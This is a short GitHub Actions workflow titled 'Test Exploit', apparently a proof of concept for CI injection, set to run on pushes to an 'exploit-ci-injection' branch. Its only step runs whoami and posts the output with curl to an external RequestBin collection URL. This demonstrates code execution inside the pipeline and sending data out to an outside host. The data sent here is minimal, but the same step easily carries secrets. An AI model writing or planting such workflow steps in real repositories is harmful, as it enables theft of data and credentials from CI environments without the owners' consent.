name: Test Exploit

on:
  push:
    branches:
      - exploit-ci-injection  # senin branch’in

jobs:
  run-whoami:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v3

      - name: Run whoami and send to RequestBin
        run: |
          WHO=$(whoami)
          curl -X POST -d "$WHO" https://requestbin.net/bins/40cb5685-21cb-4a23-b461-bd460d3accca
